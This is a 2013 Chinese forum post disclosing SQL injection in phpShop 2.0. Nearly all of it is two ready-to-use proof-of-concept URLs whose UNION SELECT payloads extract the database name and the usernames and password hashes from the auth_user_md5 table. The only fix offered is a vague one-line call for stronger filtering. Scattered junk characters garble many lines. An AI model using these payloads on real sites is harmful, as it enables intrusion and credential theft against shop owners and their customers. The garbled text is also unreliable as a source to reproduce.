找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1951|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability; ^3 ~, Z- T6 Z; w

7 m# |# b0 }3 [: e. W作者 : By onestree
/ X% G4 o( M: v下载地址 : http://code.google.com/p/phpshop/downloads/list
6 M% I# V5 d2 `5 O) j. _* \2 Q/ h测试地址: windows 7 / ubuntu
7 e. Q  I0 J% t 3 {; H" G  |4 o) t6 [1 A
& z! V& ?4 |  }* p' Z
SQLi p0c:- |& ~$ n; I0 J8 A" |
: Y! e: r$ w/ ^
==================* f3 s% _- m  z, e7 x6 B; E$ U( o

0 R9 G5 T7 l: ?; Z! khttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'! j" L) k7 y! J7 W: ~8 l' f1 G
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --+ I8 \  v3 g1 {4 @1 @6 @
# o) M- m, t( c3 C6 F# S/ v
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
$ h" H% ^( E* J- L8 d0 i0 S; n7 x0 B/ V" r
修复:
* _, m7 r, V! n* D( a. J5 J8 k加强过滤% e7 o0 N8 W& c' {' e
0 ?) y" a" q* F1 E" L! W
) `' R$ U; c( B5 R7 k, B( a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表